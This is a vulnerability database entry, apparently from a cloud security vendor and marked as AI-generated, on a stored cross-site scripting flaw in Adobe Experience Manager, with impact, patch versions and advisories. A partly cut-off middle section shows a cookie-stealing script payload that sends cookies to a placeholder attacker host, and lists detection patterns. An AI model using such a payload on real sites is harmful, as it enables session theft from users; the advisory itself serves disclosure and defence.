
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27240 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows low-privileged authenticated attackers to inject malicious scripts into vulnerable form fields, which execute in a victim's browser upon page visit. It affects AEM on-premises versions 6.5.23 and earlier (before 6.5.24) and AEM Cloud Service versions before 2026.2.0, including AEM 6.5 LTS SP1. The vulnerability was disclosed on March 10–11, 2026, as part of Adobe security bulletin APSB26-24. It carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, Feedly).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79 — Stored XSS). A low-privileged authenticated attacker can inject malicious JavaScript into vulnerable form fields within AEM; the payload is persistently stored and later executed in the browser of any user who visits the affected page. The attack vector is network-based, requires low privileges and user interaction (the victim browsing to the page), and has a changed scope, meaning the impact crosses the security boundary of the originating application context (Adobe Advisory, Feedly). No public proof-of-concept exploit code has been identified as of the time of disclosure (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of other AEM users, including administrators, who visit the page containing the injected payload. This can lead to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and potential escalation of privileges within the AEM application. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected; however, chained with other vulnerabilities, this XSS could facilitate broader compromise of the AEM environment (Adobe Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save/publish the content.<script>, javascript:, onerror=, onload=) in form field parameters.Adobe has released patches addressing this vulnerability: update AEM on-premises to version 6.5.24 or later, and AEM Cloud Service to version 2026.2.0 or later. The fix is detailed in Adobe security bulletin APSB26-24. As a general workaround prior to patching, restrict content authoring access to trusted users only and implement a Web Application Firewall (WAF) with XSS filtering rules to detect and block malicious input. Upgrading to the patched version is the recommended and definitive remediation (Adobe Advisory).
The Center for Internet Security (CIS) published an advisory noting that multiple vulnerabilities in Adobe products, including this CVE, could allow for arbitrary code execution, recommending prompt patching (CIS Advisory). Tenable flagged the vulnerability in its plugin pipeline. No significant independent researcher commentary or social media discussion has been identified beyond standard vulnerability aggregator coverage (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."